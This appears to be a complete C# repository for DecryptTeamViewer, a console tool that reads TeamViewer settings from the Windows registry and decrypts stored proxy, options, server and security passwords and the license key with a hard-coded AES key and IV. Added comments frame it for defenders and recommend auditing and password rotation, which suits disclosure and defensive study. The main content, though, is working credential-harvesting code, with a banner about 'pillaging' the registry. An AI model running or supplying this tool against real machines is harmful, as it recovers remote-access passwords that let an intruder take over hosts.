├── DecryptTeamViewer.sln ├── DecryptTeamViewer ├── App.config ├── DecryptTeamViewer.csproj ├── Program.cs └── Properties │ └── AssemblyInfo.cs └── README.md /DecryptTeamViewer.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29728.190 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DecryptTeamViewer", "DecryptTeamViewer\DecryptTeamViewer.csproj", "{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {0C02553C-431C-4BB7-AEC1-3CDC69A660E8} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /DecryptTeamViewer/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DecryptTeamViewer/DecryptTeamViewer.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07} 8 | 
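Exe 9 | DecryptTeamViewer 10 | DecryptTeamViewer 11 | v4.6 12 | 512 13 | true 14 | true 15 | publish\ 16 | true 17 | Disk 18 | false 19 | Foreground 20 | 7 21 | Days 22 | false 23 | false 24 | true 25 | 0 26 | 1.0.0.%2a 27 | false 28 | false 29 | true 30 | 31 | 32 | AnyCPU 33 | true 34 | full 35 | false 36 | bin\Debug\ 37 | DEBUG;TRACE 38 | prompt 39 | 4 40 | 41 | 42 | AnyCPU 43 | pdbonly 44 | true 45 | bin\Release\ 46 | TRACE 47 | prompt 48 | 4 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | False 70 | Microsoft .NET Framework 4.6 %28x86 and x64%29 71 | true 72 | 73 | 74 | False 75 | .NET Framework 3.5 SP1 76 | false 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /DecryptTeamViewer/Program.cs: --------------------------------------------------------------------------------
using System;
using System.Text;
using Microsoft.Win32;
using System.Security.Cryptography;

namespace DecryptTeamViewer
{
    /// <summary>
    /// Console program that reads TeamViewer settings from the registry and decrypts the
    /// <c>*AES</c> / <c>SecurityPasswordExported</c> values with the fixed key and IV
    /// embedded in <see cref="DecryptAES"/>.
    /// </summary>
    /// <remarks>
    /// Security-relevant point for reviewers and defenders: the key and IV are constants in
    /// this file, not per-host or per-user secrets. Values protected this way are therefore
    /// only as confidential as the registry ACL on the two keys opened in
    /// <see cref="GetRegValue"/>; any principal with read access to those keys can recover
    /// the plaintext offline. Practical consequences: treat these registry values as
    /// credential material, enable object-access auditing on the keys where feasible, and
    /// rotate any password that has been stored there.
    /// NOTE(review): which TeamViewer releases still write these values is not stated on
    /// this page - confirm against vendor guidance.
    /// </remarks>
    class Program
    {
        /// <summary>
        /// Prints the version, account, proxy and credential values found in the registry.
        /// Missing keys or values are printed as empty strings.
        /// </summary>
        /// <param name="args">Command-line arguments; not used.</param>
        static void Main(string[] args)
        {
            Console.WriteLine("\r\n\r\n=== DecryptTeamViewer: Pillaging registry for TeamViewer information ===\r\n");

            // TeamViewer version
            Console.WriteLine("\r\n=== TeamViewer version ===\r\n");
            Console.WriteLine(GetRegValue("TeamViewerSettings", "Version"));

            // User info
            Console.WriteLine("\r\n=== User Information ===\r\n");
            Console.WriteLine("Account name: " + GetRegValue("TeamViewerSettings", "OwningManagerAccountName"));
            Console.WriteLine("User email: " + GetRegValue("TeamViewerUserSettings", "BuddyLoginName"));

            // Proxy info
            Console.WriteLine("\r\n=== Proxy Information ===\r\n");
            Console.WriteLine("Proxy IP: " + GetRegValue("TeamViewerSettings", "Proxy_IP"));
            Console.WriteLine("Proxy username: " + GetRegValue("TeamViewerSettings", "ProxyUsername"));
            byte[] proxyPass = GetRegBytes("TeamViewerSettings", "ProxyPasswordAES");
            Console.WriteLine("Proxy password: " + DecryptAES(proxyPass));

            // Credentials
            Console.WriteLine("\r\n=== Decrypted Credentials ===\r\n");

            // Options pass
            byte[] optionsPass = GetRegBytes("TeamViewerSettings", "OptionsPasswordAES");
            Console.WriteLine("TeamViewer options password: " + DecryptAES(optionsPass));

            // Server pass
            byte[] serverPass = GetRegBytes("TeamViewerSettings", "ServerPasswordAES");
            Console.WriteLine("TeamViewer server password: " + DecryptAES(serverPass));

            // Security pass
            byte[] securityPass = GetRegBytes("TeamViewerSettings", "SecurityPasswordAES");
            byte[] exportedSecurityPass = GetRegBytes("TeamViewerSettings", "SecurityPasswordExported");
            Console.WriteLine("TeamViewer security password: " + DecryptAES(securityPass));
            Console.WriteLine("TeamViewer exported security password: " + DecryptAES(exportedSecurityPass));

            // License
            byte[] licenseKey = GetRegBytes("TeamViewerSettings", "LicenseKeyAES");
            Console.WriteLine("TeamViewer license key: " + DecryptAES(licenseKey) + "\n");
        }

        /// <summary>
        /// Reads one value from one of the two TeamViewer registry keys.
        /// </summary>
        /// <param name="hive">
        /// Selector string: <c>"TeamViewerSettings"</c> opens
        /// <c>HKLM\SOFTWARE\WOW6432Node\TeamViewer</c>, <c>"TeamViewerUserSettings"</c> opens
        /// <c>HKCU\SOFTWARE\TeamViewer</c>. Both are opened read-only.
        /// </param>
        /// <param name="value">Name of the registry value to read.</param>
        /// <returns>
        /// The value as returned by <see cref="RegistryKey.GetValue(string)"/>, or
        /// <c>null</c> when the selector is unknown, the key does not exist, or the value
        /// does not exist.
        /// </returns>
        public static object GetRegValue(string hive, string value)
        {
            RegistryKey root;
            string subKeyPath;

            if (hive == "TeamViewerSettings")
            {
                root = Registry.LocalMachine;
                subKeyPath = @"SOFTWARE\WOW6432Node\TeamViewer";
            }
            else if (hive == "TeamViewerUserSettings")
            {
                root = Registry.CurrentUser;
                subKeyPath = @"SOFTWARE\TeamViewer";
            }
            else
            {
                return null;
            }

            // The original returned a placeholder `new Object()` when the key was absent;
            // Main then cast that placeholder to byte[] and died with InvalidCastException
            // (and printed "System.Object" for the string values). Absent key now means null.
            // The key handle is also released instead of being left to the finalizer.
            using (RegistryKey regKey = root.OpenSubKey(subKeyPath, false))
            {
                return regKey == null ? null : regKey.GetValue(value);
            }
        }

        /// <summary>
        /// Reads a registry value through <see cref="GetRegValue"/> and returns it only when
        /// it is binary data; a missing value or a value of another registry type yields
        /// <c>null</c> rather than an invalid cast.
        /// </summary>
        private static byte[] GetRegBytes(string hive, string value)
        {
            return GetRegValue(hive, value) as byte[];
        }

        /// <summary>
        /// Decrypts a stored TeamViewer value with AES-128 in CBC mode using the fixed key
        /// and IV below and decodes the result as UTF-16LE text.
        /// </summary>
        /// <param name="encryptedPass">Ciphertext read from the registry; may be <c>null</c>.</param>
        /// <returns>
        /// The decoded plaintext, or <c>null</c> when <paramref name="encryptedPass"/> is
        /// <c>null</c> or the cryptographic transform rejects it (for example a length that
        /// is not a multiple of the block size). Because <see cref="PaddingMode.Zeros"/> is
        /// not stripped on decryption, the string can end in NUL characters.
        /// </returns>
        public static string DecryptAES(byte[] encryptedPass)
        {
            if (encryptedPass == null)
            {
                return null;
            }

            // Key and IV, labelled "TeamViewer Key & IV" by the original author. Both are
            // constants: the same pair is applied to every value on every host, which is why
            // these registry blobs provide obfuscation rather than confidentiality.
            byte[] key = new byte[16] { 0x06, 0x02, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00 };
            byte[] IV = new byte[16] { 0x01, 0x00, 0x01, 0x00, 0x67, 0x24, 0x4F, 0x43, 0x6e, 0x67, 0x62, 0xf2, 0x5e, 0xa8, 0xd7, 0x04 };

            try
            {
                // Both crypto objects are IDisposable; the original never released them.
                using (Aes aes = new AesManaged
                {
                    Mode = CipherMode.CBC,
                    BlockSize = 128,
                    KeySize = 128,
                    Padding = PaddingMode.Zeros
                })
                using (ICryptoTransform decryptor = aes.CreateDecryptor(key, IV))
                {
                    byte[] decryptedPass = decryptor.TransformFinalBlock(encryptedPass, 0, encryptedPass.Length);
                    return Encoding.Unicode.GetString(decryptedPass);
                }
            }
            catch (CryptographicException)
            {
                // Malformed ciphertext: keep the original best-effort contract and report "no value".
                return null;
            }
        }
    }
}
-------------------------------------------------------------------------------- /DecryptTeamViewer/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DecryptTeamViewer")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("DecryptTeamViewer")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. 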
If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d6aaed62-bbfc-4f2a-a2a4-35ec5b2a4e07")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DecryptTeamViewer 2 | Enumerate and decrypt TeamViewer settings from registry 3 | 4 | ## Usage 5 | .\DecryptTeamViewer.exe 6 | 7 | ![alt tag](https://thevivi.net/wp-content/uploads/2020/02/DecryptTeamViewerUsage.png) 8 | --------------------------------------------------------------------------------